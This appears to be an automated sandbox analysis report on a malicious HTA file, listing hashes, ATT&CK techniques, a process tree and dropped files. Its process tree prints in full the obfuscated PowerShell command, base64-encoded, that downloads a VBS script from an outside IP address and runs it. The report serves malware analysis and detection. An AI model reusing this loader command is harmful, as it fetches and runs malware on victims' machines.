32b2a9014ff68b0458e22e4c5823ec5f9bfd22d098281d0e5c245260db55ac85

General

Target

ccb5ab36adb3049199871c8ea2ac7c09.hta
Size

102KB
MD5

ccb5ab36adb3049199871c8ea2ac7c09
SHA1

3fa4c77531043b8abe2c644d72e91809a771fb09
SHA256

32b2a9014ff68b0458e22e4c5823ec5f9bfd22d098281d0e5c245260db55ac85
SHA512

d28a2b40efba758ac1eeb0555ae57db8eac57a7b6cf358ffc4bd4c802b1c7fadd4a8febd882d7b28eea1c6f301a5447905a150128df3d9a84382bc1e57bb4de0
SSDEEP

768:tZ6A3yXNA0AGAckW5GBm5JlIDJ4gKMB7s+QiXAZO:tmbuxn

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
10	4656	powershell.exe
12	1140	WScript.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4656	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4656	powershell.exe
4656	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4656	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1592 wrote to memory of 4640	1592	mshta.exe	86
PID 1592 wrote to memory of 4640	1592	mshta.exe	86
PID 1592 wrote to memory of 4640	1592	mshta.exe	86
PID 4640 wrote to memory of 4656	4640	cmd.exe	88
PID 4640 wrote to memory of 4656	4640	cmd.exe	88
PID 4640 wrote to memory of 4656	4640	cmd.exe	88
PID 4656 wrote to memory of 2652	4656	powershell.exe	89
PID 4656 wrote to memory of 2652	4656	powershell.exe	89
PID 4656 wrote to memory of 2652	4656	powershell.exe	89
PID 2652 wrote to memory of 908	2652	csc.exe	90
PID 2652 wrote to memory of 908	2652	csc.exe	90
PID 2652 wrote to memory of 908	2652	csc.exe	90
PID 4656 wrote to memory of 1140	4656	powershell.exe	91
PID 4656 wrote to memory of 1140	4656	powershell.exe	91
PID 4656 wrote to memory of 1140	4656	powershell.exe	91

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ccb5ab36adb3049199871c8ea2ac7c09.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PoWERsheLl -ex BypASs -NoP -w 1 -c DEVIcECredeNTIALdEpLoYmenT ; IeX($(iEX('[SYStem.text.ENcODInG]'+[cHAR]58+[char]58+'utF8.GeTsTriNg([sYSTEM.cONvErT]'+[cHAR]58+[ChAr]58+'frOmBASE64StRing('+[CHAr]0X22+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVyZGVGaW5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZTk9iZ20sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNR1dyR1osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUYUthTyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9hdWdPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVQYyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lU1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ5UWVxS0piZ0cgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xNDQvbW9ybmluZ2RhdGluZ2xvdmVyLnZicyIsIiRFTlY6QVBQREFUQVxtb3JuaW5nZGF0aW5nbG92ZXIudkJTIiwwLDApO1N0YXJULXNMRUVQKDMpO1N0QXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG1vcm5pbmdkYXRpbmdsb3Zlci52QlMi'+[cHar]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4640
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWERsheLl -ex BypASs -NoP -w 1 -c DEVIcECredeNTIALdEpLoYmenT ; IeX($(iEX('[SYStem.text.ENcODInG]'+[cHAR]58+[char]58+'utF8.GeTsTriNg([sYSTEM.cONvErT]'+[cHAR]58+[ChAr]58+'frOmBASE64StRing('+[CHAr]0X22+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVyZGVGaW5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZTk9iZ20sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNR1dyR1osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUYUthTyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9hdWdPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVQYyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lU1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ5UWVxS0piZ0cgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xNDQvbW9ybmluZ2RhdGluZ2xvdmVyLnZicyIsIiRFTlY6QVBQREFUQVxtb3JuaW5nZGF0aW5nbG92ZXIudkJTIiwwLDApO1N0YXJULXNMRUVQKDMpO1N0QXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG1vcm5pbmdkYXRpbmdsb3Zlci52QlMi'+[cHar]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4656
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aponbak3\aponbak3.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2652
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA151.tmp" "c:\Users\Admin\AppData\Local\Temp\aponbak3\CSCDC713C665DB24AF593A8FF612DDB79F6.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:908
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\morningdatinglover.vBS"
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA151.tmp

Filesize
1KB

MD5
8966f4008b199103f8d2c014072ef6d9

SHA1
47314ecfb766a965cb5a77a64b32f2a349a3030a

SHA256
ac53e2ec5362d709edd0d73c26d5db181702f9fd31b34cb97b653e105296c525

SHA512
af15eda9162d03be1a5a6442a5d76db6cc4559ae817ec75dc54724450c2a7623dedfd4aea51da77064828689bc16905772db04a8151b9f3e185b657c0364449e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q1dairdk.ps3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aponbak3\aponbak3.dll

Filesize
3KB

MD5
f8e0513569ef5a7df4078da0adf0208a

SHA1
82199f50ca14700ab8a32aeaf3304cd1fed88230

SHA256
ffa8f35cf341a4923f7b459b6544a88413c81b1bd8f948b35e3b4027b6e194f2

SHA512
8b975d138adba38533e61870865907504e483fd5d29e4dfb5fe94586bb74f0051592862695d9d91591485be06ea81f5f3e9d603091c2d56d35e457d901d83250

Download Submit
C:\Users\Admin\AppData\Roaming\morningdatinglover.vBS

Filesize
3KB

MD5
c537d8f37c24825679c6b293b6c02866

SHA1
63f6aa29ece8d977d1aaf97957bb7d7e55ed0a45

SHA256
339f417f442c3533c80ac1524f3de7486c17093a007a869cf84eb20689839787

SHA512
c26f0edcf027451ed18412ab9a4b3f33d46b366951573d5ab77ee0be93aa0756f658bb22e697de16860d7b5f3e281f336a8d70c58a7b3f4a5517db56d893fe28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aponbak3\CSCDC713C665DB24AF593A8FF612DDB79F6.TMP

Filesize
652B

MD5
7beff5d6622d3e86ad811f623dc5a75f

SHA1
93ef577ba650f5d8322148e924a7d7cc9ed95e1b

SHA256
5d362bc357cea7f0a9d3c19ed98680af45a0fe602bfe1f7efb22143bde17f128

SHA512
3edc44af5394f6fe0136fd1c8d6028d74e4f6c324ac5ffa194522dede67dd8dd19b526b026e22096758409793f87471c30cd28b4f8a6c3f8a946b90225774793

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aponbak3\aponbak3.0.cs

Filesize
446B

MD5
12d127af5dabfddafaf0c1a2cce85c39

SHA1
6987b89b04d2bf668dad14772e44809ac43f1067

SHA256
2a8cc776894c95f08e772d05e5d82c1befe3d6d0679d69383671c77d6a7dcfd2

SHA512
29a33f3868e98feaf70d9485ec77995c855adc7b4d349e868f6dc7a06ec18e2ad78fc48b19cdd36e8c39752fc8691172382d18ba684f6ef1ed02b63af88bc048

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aponbak3\aponbak3.cmdline

Filesize
369B

MD5
0802caef1aad7d0fc725fd48c6268700

SHA1
20702ac10a9d4e5849b274ccf8cb37f891a818f8

SHA256
9eed32476d5ba33c3bae4e618c4fbcaf10d492002843c33bb46aaf3c4b347eec

SHA512
92a468acc3805af776ba2eaec58d3bade1dc8db6047ee5b1f20a465ec27c45c0a77d2c3f0f3fd22d3bddd3a7eeef5ad7a5515b117c023f14adfe6e52e6394e49

Download Submit
memory/4656-35-0x0000000070F70000-0x0000000071720000-memory.dmp

Filesize
7.7MB

Download
memory/4656-39-0x00000000078D0000-0x00000000078DA000-memory.dmp

Filesize
40KB

Download
memory/4656-17-0x00000000060A0000-0x00000000063F4000-memory.dmp

Filesize
3.3MB

Download
memory/4656-18-0x0000000006510000-0x000000000652E000-memory.dmp

Filesize
120KB

Download
memory/4656-19-0x0000000006550000-0x000000000659C000-memory.dmp

Filesize
304KB

Download
memory/4656-21-0x000000006D830000-0x000000006D87C000-memory.dmp

Filesize
304KB

Download
memory/4656-32-0x0000000070F70000-0x0000000071720000-memory.dmp

Filesize
7.7MB

Download
memory/4656-33-0x0000000006AF0000-0x0000000006B0E000-memory.dmp

Filesize
120KB

Download
memory/4656-22-0x000000006DB40000-0x000000006DE94000-memory.dmp

Filesize
3.3MB

Download
memory/4656-34-0x00000000077C0000-0x0000000007863000-memory.dmp

Filesize
652KB

Download
memory/4656-20-0x0000000007500000-0x0000000007532000-memory.dmp

Filesize
200KB

Download
memory/4656-0-0x0000000070F7E000-0x0000000070F7F000-memory.dmp

Filesize
4KB

Download
memory/4656-36-0x0000000070F70000-0x0000000071720000-memory.dmp

Filesize
7.7MB

Download
memory/4656-37-0x0000000007EF0000-0x000000000856A000-memory.dmp

Filesize
6.5MB

Download
memory/4656-38-0x0000000007870000-0x000000000788A000-memory.dmp

Filesize
104KB

Download
memory/4656-7-0x0000000005650000-0x00000000056B6000-memory.dmp

Filesize
408KB

Download
memory/4656-40-0x0000000007AF0000-0x0000000007B86000-memory.dmp

Filesize
600KB

Download
memory/4656-41-0x0000000007A50000-0x0000000007A61000-memory.dmp

Filesize
68KB

Download
memory/4656-42-0x0000000007A80000-0x0000000007A8E000-memory.dmp

Filesize
56KB

Download
memory/4656-43-0x0000000007A90000-0x0000000007AA4000-memory.dmp

Filesize
80KB

Download
memory/4656-44-0x0000000007AD0000-0x0000000007AEA000-memory.dmp

Filesize
104KB

Download
memory/4656-45-0x0000000007AC0000-0x0000000007AC8000-memory.dmp

Filesize
32KB

Download
memory/4656-6-0x00000000055E0000-0x0000000005646000-memory.dmp

Filesize
408KB

Download
memory/4656-5-0x0000000005440000-0x0000000005462000-memory.dmp

Filesize
136KB

Download
memory/4656-4-0x0000000070F70000-0x0000000071720000-memory.dmp

Filesize
7.7MB

Download
memory/4656-3-0x0000000070F70000-0x0000000071720000-memory.dmp

Filesize
7.7MB

Download
memory/4656-58-0x0000000007AC0000-0x0000000007AC8000-memory.dmp

Filesize
32KB

Download
memory/4656-2-0x0000000005A70000-0x0000000006098000-memory.dmp

Filesize
6.2MB

Download
memory/4656-64-0x0000000007D80000-0x0000000007DA2000-memory.dmp

Filesize
136KB

Download
memory/4656-65-0x0000000008B20000-0x00000000090C4000-memory.dmp

Filesize
5.6MB

Download
memory/4656-1-0x0000000002C00000-0x0000000002C36000-memory.dmp

Filesize
216KB

Download
memory/4656-70-0x0000000070F70000-0x0000000071720000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing